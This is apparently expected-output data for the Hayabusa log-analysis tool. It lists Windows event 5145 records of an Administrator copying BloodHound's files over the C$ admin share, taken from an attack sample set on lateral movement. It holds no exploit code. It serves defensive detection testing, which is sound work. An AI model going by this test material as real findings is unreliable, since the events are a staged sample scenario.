+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
